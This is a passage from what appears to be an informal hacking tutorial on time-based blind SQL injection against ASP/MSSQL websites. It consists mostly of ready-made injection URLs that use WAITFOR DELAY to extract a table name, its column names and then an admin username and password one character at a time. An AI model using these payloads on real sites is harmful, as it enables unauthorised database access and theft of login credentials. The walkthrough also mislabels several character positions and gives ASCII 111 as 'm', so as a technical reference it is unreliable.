we need to know how mutch characters it hase ans we need to know what characters it has.
by now you should know the drill.

This one has 5 characters.

Code:
www[site].com/index.asp?id=1; if (len(select top 1 name from sysobjects where xtype='U')=5) waitfor delay'00:00:10'--[10 second delay]

we need to know the characters.

Code:
First is an U.
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85)),1,1)))=117) WAITFOR DELAY '00:00:10'-- (+10 seconds)

second an S.
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85)),2,1)))=115) WAITFOR DELAY '00:00:10'-- (+10 seconds)

Third an E.
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85)),3,1)))=101) WAITFOR DELAY '00:00:10'-- (+10 seconds)

Fourth an R.
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85)),4,1)))=114) WAITFOR DELAY '00:00:10'-- (+10 seconds)

Fifth an S.
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85)),5,1)))=115) WAITFOR DELAY '00:00:10'-- (+10 seconds)

Table name is USERS.

Extracting table column names.

how many characters does this column have. we know how it works ppl.

Code:
www.[site].com/index.asp?id=1; IF (len(select top 1 column_name from CEE.information_schema.columns where table_name='USERS')=8) waitfor delay '00:00:10'-- [10 second delay]

ok here we say we select the column name from database (thats the name we had at start DB_NAME) this one is CEE. we select this out of the table users we had above this part.
It has 8 characters.

now we need the characters to create the name.

Code:
First letter is U
www.[site].com/index.asp?id=1;; IF (ASCII(lower(substring((SELECT TOP 1 column_name from CEE.information_schema.columns where table_name='USERS'),1,1)))=117) WAITFOR DELAY '00:00:10'--

second letter is an S.
www.[site].com/index.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 column_name from CEE.information_schema.columns where table_name='USERS'),2,1)))=115) WAITFOR DELAY '00:00:10'--

third letter is an E.
www.[site].com/index.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 column_name from CEE.information_schema.columns where table_name='USERS'),3,1)))=101) WAITFOR DELAY '00:00:10'--

Fourth letter is an R.
www.[site].com/index.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 column_name from CEE.information_schema.columns where table_name='USERS'),4,1)))=114) WAITFOR DELAY '00:00:10'-- 

fifth letter is an n.
www.[site].com/index.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 column_name from CEE.information_schema.columns where table_name='USERS'),5,1)))=110) WAITFOR DELAY '00:00:10'--

second letter is an a.
www.[site].com/index.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 column_name from CEE.information_schema.columns where table_name='USERS'),6,1)))=97) WAITFOR DELAY '00:00:10'--

second letter is an m.
www.[site].com/index.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 column_name from CEE.information_schema.columns where table_name='USERS'),7,1)))=111) WAITFOR DELAY '00:00:10'--

second letter is an e.
www.[site].com/index.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 column_name from CEE.information_schema.columns where table_name='USERS'),8,1)))=101) WAITFOR DELAY '00:00:10'--

column name is username.

Now we need to extract the others. in some cases you could have up to 10.
lets say i only have 2 username and pass to keep it easy.

the second column name hase 4 characters.

Code:
www.[site].com/index.asp?id=1; IF (LEN(SELECT TOP 1 column_name from CEE.information_schema.columns where table_name='USERS' and column_name>'USER')=4) WAITFOR DELAY '00:00:10'--

the charracters:

Code:
first letter is P.
www.[site].com/index.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 column_name from CEE.information_schema.columns where table_name='USERS' and column_name>'username'),1,1)))=112) WAITFOR DELAY '00:00:10'--

Second letter is A.
www.[site].com/index.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 column_name from CEE.information_schema.columns where table_name='USERS' and column_name>'username'),2,1)))=97) WAITFOR DELAY '00:00:10'--

third letter is S.
www.[site].com/index.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 column_name from CEE.information_schema.columns where table_name='USERS' and column_name>'username'),3,1)))=115) WAITFOR DELAY '00:00:10'--

forth letter is S.
www.[site].com/index.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 column_name from CEE.information_schema.columns where table_name='USERS' and column_name>'username'),4,1)))=115) WAITFOR DELAY '00:00:10'--

so we now have the column pass.

looks like we finally get somewhere.
we have column username and pass! yay.
but not yet there not yet.

Extracting rows from columns.

extracting from column username.

count of characters: 5

Code:
www.[site].com/index.asp?id=1; IF (LEN(SELECT TOP 1 username from USERS)=5) WAITFOR DELAY '00:00:10'--

what do we do here? we select whats in the column username from table users.

we need to extract the characters now:

Code:
first letter is A.
www.[site].com/index.asp?id=1; IF (ASCII(substring((SELECT TOP 1 username from USERS),1,1))=97) WAITFOR DELAY '00:00:10'--

Second letter is D.
www.[site].com/index.asp?id=1; IF (ASCII(substring((SELECT TOP 1 username from USERS),2,1))=100) WAITFOR DELAY '00:00:10'--

third letter is M.
www.[site].com/index.asp?id=1; IF (ASCII(substring((SELECT TOP 1 username from USERS),3,1))=109) WAITFOR DELAY '00:00:10'--

fourth letter is I.
www.[site].com/index.asp?id=1; IF (ASCII(substring((SELECT TOP 1 username from USERS),4,1))=105) WAITFOR DELAY '00:00:10'--

Fith letter is N.
www.[site].com/index.asp?id=1; IF (ASCII(substring((SELECT TOP 1 username from USERS),5,1))=110) WAITFOR DELAY '00:00:10'--

We now have the name admin. (the one we need.)

extracting from column pass.

Code:
www.[site].com/index.asp?id=1; IF (LEN(SELECT TOP 1 pass from USERS)=5) WAITFOR DELAY '00:00:10'--

we need to extract the characters now:

Code:
first letter is e.
www.[site].com/index.asp?id=1; IF (ASCII(substring((SELECT TOP 1 pass from USERS),1,1))=101) WAITFOR DELAY '00:00:10'--

Second letter is f.
www.[site].com/index.asp?id=1; IF (ASCII(substring((SELECT TOP 1 pass from USERS),2,1))=102) WAITFOR DELAY '00:00:10'--

third letter is f.
www.[site].com/index.asp?id=1; IF (ASCII(substring((SELECT TOP 1 pass from USERS),3,1))=102) WAITFOR DELAY '00:00:10'--

fourth letter is e.
www.[site].com/index.asp?id=1; IF (ASCII(substring((SELECT TOP 1 pass from USERS),4,1))=101) WAITFOR DELAY '00:00:10'--

Fith letter is c.
www.[site].com/index.asp?id=1; IF (ASCII(substring((SELECT TOP 1 pass from USERS),5,1))=99) WAITFOR DELAY '00:00:10'--

pass= effec

Now we have username: admin and his pass effec.